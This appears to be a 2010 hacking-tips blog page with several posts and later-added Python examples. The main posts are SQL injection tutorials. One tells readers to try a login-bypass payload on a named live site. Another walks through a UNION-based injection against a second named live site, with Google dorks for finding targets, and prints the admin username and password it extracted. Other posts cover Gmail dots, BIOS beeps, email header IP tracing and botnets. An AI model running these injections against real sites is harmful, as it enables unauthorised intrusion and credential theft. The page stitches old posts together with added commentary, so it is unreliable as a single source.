Saturday, 16 January 2010

SQL Injection


When building a website where users register and must be told apart, something has to store the user-names and passwords. Flat files can do the job, but they are often more of a bane than a boon, and that is where databases replace them. A database keeps its data in tables, which are easy to search, modify, add to and delete from.
SQL, short for Structured Query Language, is the language used to read and change the data held in such databases. Most websites have a login form: you are let in to extra facilities if you hold the correct pair of user-name and password, and the user-name, as most of you know, is unique. Nowadays most of that authentication goes through SQL, so it is worth knowing what the queries look like.
select * from table; is a very common SQL query; the asterisk means every column. During user authentication a plausible query is built from these pieces:
$query – An SQL query.
$username – a variable having the user name provided by the user in the user name text box.
$password – a variable having the password provided by the user in the password text box.

$query = "select password from logtable where username = '" . $username . "'";
$result = mysql_query($query);   // the user's input is part of the SQL text: this is the injection point
$row = mysql_fetch_row($result);
$spass = $row[0];                 // stored password of the first row the query matched
if ($password == $spass) {
    echo "User Authenticated";
}

This is a simplified "example", and it doesn't pretend to be syntactically exact; what I have tried to show is how a basic user authentication could be performed.
Note: there are many other methods, but this is a basic one, and the kind that is prone to SQL injection.
Now consider this query:
select password from logtable where username = '' or 'a' = 'a';
The where clause is true for every row, because 'a' = 'a' always holds, so the query no longer picks out one user: it returns the password of every row in the table, and since the application only looks at the first result, that is the same as being matched against the first entry. So instead of a real user-name, enter this (' or 'a'='a) without the brackets in the user-name field. If the query is the insecure one above, the string lands in place of $username:
$query = "select password from logtable where username = '" . $username . "'";
and the query hands back the first entry's password. In the equally common variant where the password is also checked inside the where clause, the same payload makes the whole condition true and logs you in as the first user in the table without knowing any password.
Try it out at www.fiitjee.com.
It's prone to SQL injection for now. I hope they correct the code as soon as possible; the earlier the better for them!
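As an added example (not code from the post above), here is the same logic in Python against an in-memory SQLite table, so it can be run without a web server or MySQL. The table, the two users and their passwords are constructed for the example. The first two functions build the query by string concatenation exactly as the PHP above does; the third is the fix: the value is passed as a bound parameter, so the quote in the payload is data, not SQL.

```python
import sqlite3

# Constructed sample data for this example; not from the original post.
USERS = [("alice", "s3cret"), ("bob", "hunter2")]
PAYLOAD = "' or 'a'='a"   # the string the post suggests typing into the user-name box


def make_db():
    """In-memory stand-in for the post's 'logtable' (passwords in clear text, as in the post)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table logtable (username text, password text)")
    conn.executemany("insert into logtable values (?, ?)", USERS)
    return conn


def lookup_password_vulnerable(conn, username):
    """The post's query, built by pasting the user name into the SQL text.
    Returns every password the query matched: a normal name matches one row,
    the payload turns the WHERE clause into 'always true' and matches all rows."""
    query = "select password from logtable where username = '" + username + "'"
    return sorted(row[0] for row in conn.execute(query))


def authenticate_vulnerable(conn, username, password):
    """Common variant that checks the password inside the query as well.
    With the payload in both fields the whole condition is true for every row,
    so the first row in the table logs the attacker in. Returns the user logged in as."""
    query = ("select username from logtable where username = '" + username
             + "' and password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def authenticate_safe(conn, username, password):
    """Hardened form: a parameterised query. The driver sends the value
    separately from the SQL, so quotes in the input cannot change the query."""
    row = conn.execute(
        "select password from logtable where username = ?", (username,)
    ).fetchone()
    # Real code would compare a salted password hash here, not the clear text.
    return row is not None and row[0] == password


if __name__ == "__main__":
    db = make_db()
    print(lookup_password_vulnerable(db, PAYLOAD))        # both passwords leak
    print(authenticate_vulnerable(db, PAYLOAD, PAYLOAD))  # 'alice'
    print(authenticate_safe(db, PAYLOAD, PAYLOAD))        # False
```

Note that in the "password checked in SQL" variant the payload has to go into the password field as well (or a comment has to cut the rest of the query off), because AND binds tighter than OR: with the payload only in the user-name, the condition still requires the real password.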

SQL Injection : Ultimate method for Website Hacking.


I just found a good security expert (Nishant Soni) on Orkut. He is going to teach you about SQL injection, sniffing, Trojans and many more topics. Hope you enjoy them.
Welcome to my very first tutorial, on SQL injection, on Genius Hackers. SQL injection means getting the database behind a website to execute a query of your choosing, so that it hands over information that is not visible to a normal user. The database is usually part of the website and holds user names, passwords, posts, replies and so on. If the site builds its queries carelessly, you can feed it commands (queries, requests, whatever you want to call them) that pull that hidden information out.
SQL injection has been used many times in the past to steal credit card details, e-mail addresses and passwords, and because most people use the same password for all of their e-mail accounts, breaking into one account often gives access to all of them. It is also a standard check that penetration testers run to see whether a client's website can be made to leak information this way. In this article I will show you how they do it. All that is expected of you is basic computer knowledge. This tutorial will tell you how to start, where to stop and what to do; if you have further questions, post them here and I will help you work through them.
PLEASE REMEMBER: neither Nishant Soni nor Genius Hackers takes responsibility for whatever damage you do with this knowledge. It is for educational purposes only, so that you can secure your own website.
I will divide this tutorial into points, to help you understand the structure of the SQL database that works at the back end of a website to store and serve its information.
I will use a LIVE website in this tutorial, so you can try it yourself; believe me, it really helps to develop your skills.
The website that I will use today is www[dot]rfidupdate[dot]com.
The simplest way to explain what an SQL database is: think of any website where you can register, log in or create a profile. It saves the data you enter and displays it again whenever you present the correct user name and password. The site above works the same way: it lets you become a member and updates you daily with news.
1. How do I check whether a website is vulnerable to SQL injection?
A:
On most websites I read people saying to add a ' (single quote) at the end of the URL, and if you get an error the website is vulnerable. Being an experienced penetration tester, I'd rather tell you that this is a TOTAL MYTH. The best way to check is to append +order+by+6753 to the URL. 97% of websites don't have more than 6753 columns; in fact it is generally noticed that a site has no more than about 100 columns at most. So by adding 6753 you ask the database to sort by column number 6753, which it obviously doesn't have; if that produces an error, the WEBSITE IS VULNERABLE and you can proceed further. For this check the URL must be selecting a specific record, i.e. website.com/index.php?page=11, where the site is pulling up record number 11. So to test it, try website.com/index.php?page=11+order+by+6753.

2. How would I find vulnerable websites?
A: Google is the hacker's best friend.
When I say this, don't assume I am just writing it because I am supposed to; I really mean it. There are things called "Google dorks", search queries that make Google return a specific group of pages.
Here are some Google dorks you may try to find vulnerable websites:
a. inurl:index.php?page=
b. inurl:members.php?member=
c. inurl:index.php?id=
d. inurl:articles.php?page=

These find websites that are driven by an SQL database at the back end. Some of them may be vulnerable to SQL injection, so you can append order+by+6753 to the URL to check.
Step 1 : Finding a vulnerable page.
Let's start. As you know, the website I will test today is www.RfidUpdate.com, so open it in the browser. A little background: RFID means "radio frequency identification". On the right-hand side you will see an option to subscribe to the site. When you subscribe, your e-mail address has to be saved somewhere, so the site must have a database. We now know the website is backed by an SQL database, so we are on the right track.
As I wrote earlier, to perform SQL injection we need a page with something.php?id=2121 at the end of the URL, so let's look for one on RfidUpdate.com. I found one by exploring the website a bit. The URL of the page is:
http://www.rfidupdate.com/articles/index.php?id=1563
Image 1: SQL Injection (Click to enlarge )
Now we know it has an SQL database and we have a page to start with.
Let's check whether the page is vulnerable by appending +order+by+6753-- as described earlier. (The trailing -- starts a MySQL comment that swallows the rest of the site's original query; MySQL requires whitespace after the two dashes, so in a URL the robust form is --+ or -- -.)
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+6753--
You should now see an error that says:
"Error 1054: Unknown column '6753' in 'order clause'"

That is the database telling you "there is no such column". The particular error doesn't matter; what matters is that the text came from the database itself, which means the injected ORDER BY reached MySQL and the site echoes database errors straight to the page. That is what makes this error-based technique possible (a site that hides its errors can still be injectable, it just needs blind techniques instead). So there is a good chance we can exploit it.
Step 2 : Finding the number of columns.
Next we find out how many columns the query behind this page selects. Instead of 6753, start from 1, then 5, then 10, then 15, and keep going until you get an error. Try the following URL.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+1--
The page opened up fine, which means the query has at least 1 column; now try 5.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+5--
Same thing; now try 10.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+10--
Still no error; try 15.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+15--
Still no error :( ; try 20.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+20--
WHOA! We got the error, which means the number of columns is somewhere from 15 to 19. So let's try 16 now.
http://www.rfidupdate.com/articles/index.php?id=1563+order+by+16--
YAY! You got the error on 16 as well, which means the query has exactly 15 columns. Now let's move on.
Step 3 : Using "Union All Select".
Now we append a second query whose 15 columns are just the numbers 1 to 15, and see which of them the page displays. The URL is:
http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
Image 2: SQL Injection (Click to enlarge )
FYI: notice that I have added a "-" before 1563. Making the id negative ensures the site's own query matches no row, so the page renders the row our UNION produces instead.
The page now looks somewhat broken, and the only column whose number appears on its own on the page is 7. That is the base of the attack: everything from now on goes through column 7, because whatever we put there is what the page shows.
So let's find out more about the DATABASE this website uses. Replace the 7 with @@version (without quotes, of course) and try this:
http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15--
Image 3: SQL Injection (Click to enlarge )
This is what you should see now:
5.0.67-community

So the site runs MySQL 5.0 (5.0.67, community edition). That matters: from version 5.0 MySQL exposes the information_schema catalogue, which the next queries use to list tables and columns. Now try the following URL to move further.
http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15+from%20information_schema.tables%20where%20table_schema=database()--
Image 4: SQL Injection (Click to enlarge)
Here we have replaced column 7 with group_concat(table_name) and appended from information_schema.tables where table_schema=database(). That is standard SQL: information_schema.tables lists every table the server knows about, table_schema=database() restricts it to the database this website uses, and group_concat() joins all the names into one string so they fit in the single column we can see.
YAY! You should now see the names of the tables, and one of them is ru_Admin. That is what we are looking for. Now that we have the admin table, we find its column names and then the user name and password stored in it. Enter the following URL in the address bar:
http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15+from%20information_schema.columns%20where%20table_schema=database()--
The only change is tables to columns (information_schema.columns and column_name). You should now see the column names of every table in the database, and among them the admin table's columns, which look like this:
"ru_Admin_Username,ru_Admin_Password"
So we can read both the user name and the password. To see the data inside those two columns, enter the following URL:
http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(ru_Admin_username,0x3a,ru_Admin_password),8,9,10,11,12,13,14,15+from%20ru_Admin--
What we did is put the column names ru_Admin_username and ru_Admin_password into column 7 and select them from the ru_Admin table at the end; 0x3a is the hexadecimal code for ":", so each user name comes out separated from its password by a colon.
Image 5: SQL Injection (Click to enlarge )


VOILA! What you're looking at now is the admin user name and password in the format
username:password
admin:admRIvuxHahkQ
FYI: wherever you see %20 in a URL, it stands for a SPACE in the address bar.

So you have the password now; use it the way you want!
That is how an SQL injection attack is performed. Try your own things with the Google dorks I posted at the beginning, but keep in mind that if you know 80/100, there are people out there who know 90/100. So secure yourself first, and only try these attacks with the permission of the site owners.
Thank you all for reading this tutorial; I am sure it helped. If there are any more questions, feel free to reply to this post.
Enjoy ethical hacking
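To tie the three steps together, here is an added Python example, not the tutorial's own code, that scripts the whole procedure against an in-memory SQLite database standing in for the site. The articles and ru_Admin tables, their contents and the five-column layout are constructed for the example and are not the real site's schema; SQLite has no @@version or information_schema, so sqlite_version(), sqlite_master and pragma_table_info() are used in their place, and group_concat(a || ':' || b) replaces MySQL's group_concat(a,0x3a,b). vulnerable_page() builds the query the way the tutorial's index.php?id= page evidently does; safe_page() at the end is the fix.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's database (assumed schema, not the real one)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        create table articles (id integer, title text, body text, author text, published text);
        insert into articles values (1563, 'RFID news', 'Article body', 'staff', '2010-01-16');
        create table ru_Admin (ru_Admin_Username text, ru_Admin_Password text);
        insert into ru_Admin values ('admin', 'example-password');
    """)
    return conn


def vulnerable_page(conn, id_param):
    """index.php?id=... as the tutorial describes it: the parameter is pasted into the SQL
    unquoted. Returns the (title, body) the page would render, or raises sqlite3.Error
    where the real site echoed a MySQL error."""
    query = "select id, title, body, author, published from articles where id=" + id_param
    row = conn.execute(query).fetchone()
    return None if row is None else (str(row[1]), str(row[2]))


def find_column_count(conn, base_id, limit=100):
    """Step 2: ORDER BY n succeeds while n is at most the number of selected columns
    and errors once it is larger, so the last n that worked is the count."""
    for n in range(1, limit + 1):
        try:
            vulnerable_page(conn, f"{base_id} order by {n}--")
        except sqlite3.Error:
            return n - 1
    return None


def union_extract(conn, base_id, column_count, expression, from_clause="", visible_column=2):
    """Step 3: negate the id so the real query matches nothing, then UNION a row whose
    visible column (the tutorial's '7'; here column 2, the title) carries our expression."""
    cols = [str(i) for i in range(1, column_count + 1)]
    cols[visible_column - 1] = expression
    payload = f"-{base_id} union all select {','.join(cols)} {from_clause}--"
    title, _body = vulnerable_page(conn, payload)
    return title


def dump_admin(conn, base_id="1563"):
    """Runs the tutorial's sequence: column count, version, tables, columns, credentials."""
    count = find_column_count(conn, base_id)
    version = union_extract(conn, base_id, count, "sqlite_version()")
    tables = union_extract(conn, base_id, count, "group_concat(name)",
                           "from sqlite_master where type='table'")
    columns = union_extract(conn, base_id, count, "group_concat(name)",
                            "from pragma_table_info('ru_Admin')")
    creds = union_extract(conn, base_id, count,
                          "group_concat(ru_Admin_Username || ':' || ru_Admin_Password)",
                          "from ru_Admin")
    return count, version, tables, columns, creds


def safe_page(conn, id_param):
    """Hardened form: reject anything that is not an integer and bind the value,
    so 'order by' or 'union' text never reaches the SQL parser as SQL."""
    if not id_param.lstrip("-").isdigit():
        return None
    return conn.execute("select title, body from articles where id=?",
                        (int(id_param),)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(dump_admin(db))   # (5, '<sqlite version>', 'articles,ru_Admin', 'ru_Admin_Username,ru_Admin_Password', 'admin:example-password')
    print(safe_page(db, "-1563 union all select 1,2,3,4,5--"))   # None: rejected before it reaches SQL
```

The column-name step here is filtered to the one table of interest (pragma_table_info('ru_Admin')); against MySQL the equivalent is adding where table_name='ru_Admin' to the information_schema.columns query, which keeps the output readable on a real site with many tables.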

Monday, 11 January 2010

GMAIL Does Not Recognise Dots(..)


Hi friends...
Here is something surprising and interesting. We have been using Gmail for years, but you may not have noticed this feature: Gmail does not recognise dots in the user name.
On the Gmail login page you can put any number of dots in the user name; Gmail simply ignores them.
For example, if your user name is xyz@gmail.com, then entering
x.y.z@gmail.com
x.....y.z@gmail.com
xyz...@gmail.com
or any other arrangement of dots, with the same password, logs in successfully. Try it once :)
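The practical consequence is that a web application cannot treat two Gmail strings as different accounts just because they differ in dots: duplicate-account checks, per-address rate limits and "already registered" lookups all need to canonicalise the address first. The following is an added Python example, not part of the post, that does that. It goes slightly beyond the post: it also folds googlemail.com into gmail.com and lower-cases the Gmail local part, both of which Google treats as the same mailbox; it leaves the "+tag" suffix alone since the post does not cover it.

```python
# Added example: canonicalise addresses so dot-variants of a Gmail mailbox compare equal.
GOOGLE_DOMAINS = {"gmail.com", "googlemail.com"}   # Google delivers both to the same mailbox


def normalize_email(address):
    """Return a canonical form of an e-mail address.
    For Gmail: dots in the local part are ignored, case is ignored and
    googlemail.com is folded to gmail.com. Other domains: only the domain
    is lower-cased, since their local parts are, strictly, case-sensitive."""
    local, sep, domain = address.strip().rpartition("@")
    if not sep or not local or not domain:
        raise ValueError(f"not an e-mail address: {address!r}")
    domain = domain.lower()
    if domain in GOOGLE_DOMAINS:
        local = local.replace(".", "").lower()
        domain = "gmail.com"
    return f"{local}@{domain}"


def same_mailbox(a, b):
    """True when two address strings reach the same mailbox under the rules above."""
    return normalize_email(a) == normalize_email(b)


def distinct_mailboxes(addresses):
    """Number of distinct mailboxes in a list, e.g. for a sign-up or rate-limit check."""
    return len({normalize_email(a) for a in addresses})


if __name__ == "__main__":
    print(same_mailbox("x.y.z@gmail.com", "xyz@gmail.com"))   # True
    print(distinct_mailboxes(["xyz@gmail.com", "x.y.z@gmail.com",
                              "xyz...@googlemail.com", "x.y.z@example.com"]))   # 2
```

Store the normalised form alongside the address the user typed, and run uniqueness and abuse checks on the normalised column; keep sending mail to the original string.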

Sunday, 10 January 2010

Understand The Beep


These are the patterns used by AMI BIOSes; Award and Phoenix BIOSes use different codes, so check your board's manual if the list below does not match what you hear.

One Beep :
DRAM refresh failure
This may be due to:
- Bad memory chips
- A bad DMA chip
- Bad memory addressing chips on the motherboard

Two Beeps :
Parity error or parity circuit failure
- Your memory may not be seated properly on the motherboard.
- Unplug it and plug it back in properly.

Three Beeps :
Bad memory or bad mother board

Four beeps :
Timer failure in the RAM.

Five Beeps :
CPU chip may be dead

Six Beeps :
Keyboard controller may have failed

Seven beeps :
CPU is dead. Reseat the connections and test.
- If that fails, replace the whole motherboard.

Eight Beeps :
Video card is missing or Bad.

Nine Beeps :
Damaged ROM BIOS.
-BIOS chip has to be replaced if it persists.

Ten Beeps :
CMOS shutdown.
-Replace CMOS memory and associated chips.

Eleven Beeps :
Cache memory test has failed.
- To enable cache memory, try CTRL+ALT+SHIFT++.

One long Beep and Three short Beeps:
Memory failure

One long Beep and Eight short Beeps :
Video card failure.
-Try to install video card in another slot.

No Beeps :
Check Power supply
-Check mother board connections
-Remove all cards except video card and check for system power up
-Insert all cards one at a time and check their operation.
- If the system hangs when a particular card is installed, that card is the cause; replace it with another of the same type and check again.

How to find the IP address of the email sender in Yahoo! Mail

A guide to tracking an e-mail back to the sender's IP address using the message headers.

In this tutorial I explain how to get the IP address of a sender in Yahoo Mail. This is useful if someone is spamming your inbox with junk mail, or for any other reason you may have to find where a message came from.

Once you have the IP address, use an IP location lookup service to get the approximate location (country, often the city) of the sender.

Note: you won't get the sender's real IP address if the sender relays through an anonymous proxy or a VPN, and the address you find is the machine that handed the message to the mail system, which may be a shared mail server rather than the sender's own PC.

Here is a step by step guide to get the IP address of an email sender in Yahoo! Mail:

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or any folder where you have stored your mail.
3. Open the mail
4. At the bottom right of the message you will see a drop-down option "Full Headers". If you can't find it, press Ctrl+F and search for "header".


5. Click on it and look for Received: from followed by an IP address in square brackets [ ].


6. That is most likely the sender's IP address. If there are several Received: from lines with IP addresses, take the one in the last (bottom-most) Received: line: each relay adds its own line at the top, so the bottom one is the hop closest to the sender. If no Received: from line carries an IP address, take the first IP address in X-Originating-IP. Bear in mind that only the Received: lines added by your own provider's servers can be trusted; a sender can forge the ones below them.

Now you can find the sender's approximate location by using GeoBytes IP Locator or IP2Locatio
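The steps above can be scripted against the raw header block once it is copied out of the "Full Headers" view. The following Python is an added example, not part of the original post; the message it parses is constructed (documentation and RFC 1918 addresses, invented host names) to look like a real three-hop delivery. last_received_ip() applies the post's rule literally; sender_ip() adds the check a practitioner would want, skipping private LAN addresses so a sender behind a home router does not show up as 192.168.x.x.

```python
import re
from email import message_from_string
from ipaddress import ip_address, ip_network

# Constructed sample (not a real message), laid out as a "Full Headers" view shows it.
# Each relay prepends its own Received: line, so the top one is the hop nearest the
# recipient and the bottom one is the earliest hop, nearest the sender.
SAMPLE_MESSAGE = """\
Received: from mta-out.example.net (mta-out.example.net [192.0.2.10])
  by mx.mail.example with SMTP; Sat, 16 Jan 2010 10:00:00 -0800
Received: from smtp.sender.example (smtp.sender.example [198.51.100.7])
  by mta-out.example.net with ESMTP; Sat, 16 Jan 2010 09:59:50 -0800
Received: from home-pc ([192.168.1.20])
  by smtp.sender.example with ESMTPA; Sat, 16 Jan 2010 09:59:40 -0800
X-Originating-IP: [198.51.100.7]
From: someone@sender.example
Subject: test

body
"""

IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
BRACKETED_IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
# RFC 1918 and loopback ranges: an address here is the sender's LAN, not an Internet host.
PRIVATE_NETS = [ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def received_ips(raw_message):
    """Bracketed IPv4 address from each Received: line, top of the headers first."""
    msg = message_from_string(raw_message)
    ips = []
    for header in msg.get_all("Received") or []:
        match = BRACKETED_IPV4.search(header)
        if match:
            ips.append(match.group(1))
    return ips


def originating_ip_header(raw_message):
    """First IPv4 address in X-Originating-IP, or None when the header is absent."""
    match = IPV4.search(message_from_string(raw_message).get("X-Originating-IP", ""))
    return match.group(0) if match else None


def last_received_ip(raw_message):
    """The post's rule as stated: the IP in the last (bottom-most) Received: line,
    falling back to X-Originating-IP when no Received: line carries one."""
    ips = received_ips(raw_message)
    return ips[-1] if ips else originating_ip_header(raw_message)


def sender_ip(raw_message):
    """Same walk from the bottom up, but skipping private (NAT) addresses so a home
    user's LAN address does not mask the public address they sent through.
    Only the lines added by your own provider's servers are trustworthy; a sender
    can forge everything below them, so treat the result as a lead, not proof."""
    for ip in reversed(received_ips(raw_message)):
        if not any(ip_address(ip) in net for net in PRIVATE_NETS):
            return ip
    return originating_ip_header(raw_message)


if __name__ == "__main__":
    print(received_ips(SAMPLE_MESSAGE))      # ['192.0.2.10', '198.51.100.7', '192.168.1.20']
    print(last_received_ip(SAMPLE_MESSAGE))  # 192.168.1.20 (the sender's LAN address)
    print(sender_ip(SAMPLE_MESSAGE))         # 198.51.100.7
```

Python's ipaddress module flags the documentation ranges used in the sample (192.0.2.0/24, 198.51.100.0/24) as non-global, which is why the private check is written against explicit RFC 1918 networks rather than is_private.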

Saturday, 9 January 2010

BOTNET REVEALED

  • What is a botnet?
  • How are botnets used?
  • Bot commands
  • Types of botnet
    • Classification of botnets according to architecture
    • Classification of botnets according to network protocols
  • Botnet evolution
  • P2P botnets
  • The botnet business
  • Conclusion
This article discusses zombie networks, or botnets: how they are created, who uses them to make money and how that is done. Readers already familiar with the subject will find the information on the latest trends in botnet development of interest.
The article is the first in a series of publications on the botnet problem.
Botnets have been in existence for about 10 years; experts have been warning the public about the threat posed by botnets for more or less the same period. Nevertheless, the scale of the problem caused by botnets is still underrated and many users have little understanding of the real threat posed by zombie networks (that is, until their ISP disconnects them from the Internet, or money is stolen from their credit cards, or their email or IM account is hijacked).

What is a botnet?

First of all, we need to understand what a botnet or zombie network is.
A botnet is a network of computers made up of machines infected with a malicious backdoor program. The backdoor enables cybercriminals to remotely control the infected computers (which may mean controlling an individual machine, some of the computers making up the network or the entire network).
Malicious backdoor programs that are specifically designed for use in creating botnets are called bots.
Botnets have vast computing power. They are used as a powerful cyber weapon and are an effective tool for making money illegally. The owner of a botnet can control the computers which form the network from anywhere in the world – from another city, country or even another continent. Importantly, the Internet is structured in such a way that a botnet can be controlled anonymously.
Computers infected with a bot can be controlled either directly or indirectly. When bots are controlled directly, the cybercriminal establishes a connection with an infected computer and manages it by using commands built into the bot program. In the case of indirect control, the bot connects to the control center or other machines on the network, sends a request and then performs the command which is returned.
The owner of an infected machine usually does not even suspect that the computer is being used by cybercriminals. This is why computers infected with bot malware and which are surreptitiously controlled by cybercriminals are also called zombies. The networks formed from infected machines can be called zombie networks. Most zombie machines are home users' PCs.

How are botnets used?

Botnets can be used by cybercriminals to conduct a wide range of criminal activity, from sending spam to attacking government networks.
Sending spam. This is the most common use for botnets, and is also one of the simplest. Experts estimate that over 80% of spam is sent from zombie computers. It should be noted that spam is not always sent by botnet owners: botnets are often rented by spammers.
It's the spammers who understand the real value of botnets. According to our data, an average spammer makes $50,000 – $100,000 a year. Botnets made up of thousands of computers allow spammers to send millions of messages from infected machines within a very short space of time. In addition to speed and the sheer volume of spam that can be sent, botnets provide spammers with one more advantage. Addresses used to send spam are often blacklisted, and messages coming from these addresses will be blocked or automatically flagged as spam by mail servers. Using hundreds of thousands of email addresses ('borrowed' from the owners of zombie computers) helps spammers overcome this problem.
Another botnet 'bonus' for spammers is the opportunity to harvest email addresses from infected computers. Stolen addresses are sold to spammers or used by the botnet owners themselves to send spam. A growing botnet will add more and more new addresses to the harvest.
Blackmail. The second most popular method of making money via botnets is to use tens or even hundreds of thousands of computers to conduct DDoS (Distributed Denial of Service) attacks. This involves sending a stream of false requests from bot-infected machines to the web server under attack. As a result, the server will be overloaded and consequently unavailable. As a rule, cybercriminals demand payment from the server's owner in return for stopping the attack.
Today, many companies work exclusively on the Internet. Downed servers bring business to a halt, resulting in financial losses. To return stability to servers as soon as possible, such companies are more likely to give in to blackmail than ask the police for help. This is exactly what cybercriminals are counting on, and DDoS attacks are becoming increasingly common.
DDoS attacks can also be used as a political tool. In such cases, attacks usually target servers belonging to government organizations. What makes such attacks particularly dangerous is that they can be used as provocation, with a cyber attack on one country being conducted from servers in another country and controlled from a third country.
Anonymous Internet access. Cybercriminals can access web servers using zombie machines and commit cybercrimes such as hacking websites or transferring stolen money. This activity, of course, appears to come from the infected machines.
Selling and leasing botnets. One option for making money illegally using botnets is based on leasing them or selling entire networks. Creating botnets for sale is also a lucrative criminal business.
Phishing. Addresses of phishing pages are often blacklisted soon after they appear. A botnet allows phishers to change the addresses of phishing pages frequently, using infected computers as proxy servers. This helps conceal the real address of the phishers' web server.
Theft of confidential data. This type of criminal activity will probably never lose its attraction for cybercriminals. Botnets help increase the haul of passwords (passwords to email and ICQ accounts, FTP resources, web services etc.) and other confidential user data by a factor of a thousand. A bot used to create a zombie network can download another malicious program, e.g., a password stealing (PSW) Trojan, and infect all the computers on the botnet with it, providing cybercriminals with passwords from all the infected computers. Stolen passwords are sold or used for mass infections of web pages (in the case of FTP account passwords) in order to further spread the bot program and expand the zombie network.

Bot commands

Bots can carry out a wide range of commands, but the most common ones are listed below. Command names can vary from one bot implementation to another, but the functions performed remain the same.
Update: download and launch a designated executable file or module from a specific server. This is a basic command and is the first to be executed. It is used to update a bot's executable file at the command of the zombie network owner if the owner wants to install a new version of the bot program. It can also be used to infect the computer with other malicious programs (such as viruses or worms) and install other bots on the computer. Using this command, PSW Trojans can be installed on all computers that make up the botnet at the same time in order to find all the passwords ever entered on each computer and stored in its memory. The passwords will be sent to a server on the Internet.
Flood: start creating a stream of false requests to a specific Internet server in order to make it fail or to overload channels in a specific segment of the Internet. Such streams can cause servers to malfunction, making them inaccessible to ordinary users. Such attacks using botnets are called DDoS (distributed denial of service). Although there are numerous methods that can be used to create false network requests, describing them in detail is beyond the scope of this article.
Spam: download a spam message template and begin sending spam to designated addresses (each bot is assigned a set of addresses).
Proxy: use the computer as a proxy server. This function is often included in a bot's core functionality rather than being implemented as a separate command. This feature makes it possible to use any computer which is part of a botnet as a proxy server in order to conceal the real address of the cybercriminal controlling the botnet.
Other commands, which are not as popular as those described above, are only implemented in some bots. These additional commands include making screenshots, logging keystrokes, requesting the user's network activity log file (used for stealing accounts and confidential data), sending this file from the user's computer, identifying serial numbers for the software installed on the user's computer, obtaining detailed information about the user's system and network environment, requesting a list of computers included in the botnet, etc.

Types of botnet

Today's botnet classification is relatively simple and is based on the botnet's architecture and on the protocols used to control the bots.

Classification of botnets according to architecture

There are currently only two known types of botnet architecture.
  1. Centralized botnets. In this type of botnet, all computers are connected to a single command-and-control center or C&C. The C&C waits for new bots to connect, registers them in its database, tracks their status and sends them commands selected by the botnet owner from a list of bot commands. All zombie computers in the botnet are visible to the C&C. The zombie network owner needs access to the command and control center to be able to manage a centralized botnet.


    Figure 1. Centralized topology (C&C)
    Centralized botnets are the most widespread type of zombie network. They are easier to create, easier to manage and respond to commands faster. However, they are also easier to combat, since the entire zombie network is neutralized if the C&C is put out of commission.
  2. Decentralized or P2P (peer-to-peer) botnets. In a decentralized botnet, bots connect to several infected machines on a bot network rather than to a command and control center. Commands are transferred from bot to bot: each bot has a list of several 'neighbors', and any command received by a bot from one of its neighbors will be sent on to the others, further distributing it across the zombie network. In this case, a cybercriminal needs to have access to at least one computer on the zombie network to be able to control the entire botnet.


    Figure 2. Decentralized topology (P2P)
    In practice, building decentralized botnets is not an easy task, since each newly infected computer needs to be provided with a list of bots to which it will connect on the zombie network. It is much easier to direct a bot to a central server first, where it will receive a list of 'neighbor' bots, and only then switch it to P2P connections. This mixed topology is also categorized as P2P, although at a certain stage the bots will use a C&C. Combating decentralized botnets is a much more difficult task than that of combating centralized networks as an active P2P botnet has no control center.

Classification of botnets according to network protocols

For a botnet owner to be able to send commands to a bot, it is essential that a network connection be established between the zombie machine and the computer transmitting commands to it. All network connections are based on protocols that define rules for the interaction between computers on the network. Therefore, botnets can be classified based on the network protocols used.
Botnets can be divided into the following classes when classified according to network protocols:
  1. IRC-oriented. This is one of the very first types of botnet: bots were controlled via IRC (Internet Relay Chat) channels. Each infected computer connected to the IRC server specified in the body of the bot program and waited on a particular channel for commands from its master.
  2. IM-oriented. This type of botnet is not particularly common. It differs from IRC-oriented botnets only in that it uses communication channels provided by IM (instant messaging) services such as AOL, MSN, ICQ etc. The reason for the relatively low popularity of such botnets lies in the difficulty of creating individual IM accounts for each bot. Bots should be connected to the network and remain online all the time. Since most IM services do not permit logging on to the system from more than one computer at a time while using the same account, each bot needs its own IM account. However, IM services try hard to prevent any kind of automatic account registration. As a result, owners of IM-oriented botnets only have a limited number of registered IM accounts at their disposal, which limits the number of bots that can be online at any one time. Of course, they can arrange for different bots to share the same account, come online at predefined times, send data to the owner's number and wait for a reply for a limited period of time, but this is inefficient: it takes such networks too long to respond to their masters' commands.
  3. Web-oriented. This is a relatively new and rapidly evolving type of botnet designed to control zombie networks over the World Wide Web. A bot connects to a predefined web server, receives commands from it and sends data back in response. Such zombie networks are popular because they are relatively easy to create, there is no shortage of web servers on the Internet and a web interface makes management easy.
  4. Other. In addition to the types listed above, there are botnets that communicate over a protocol of their own built directly on the TCP/IP stack, i.e. they use raw TCP, UDP or even ICMP rather than an application-layer protocol such as IRC or HTTP.

Botnet evolution

The history of botnets began in 1998 - 1999, when the first backdoor programs – the notorious NetBus and BackOrifice2000 – appeared. These were proof-of-concept Trojans, i.e. programs that implemented completely new technologies. NetBus and BackOrifice2000 were the first to include a complete set of functions that made it possible to remotely administer infected computers, enabling cybercriminals to perform file operations on remote machines, launch new programs, make screenshots, open or close CD-ROM drives, etc.
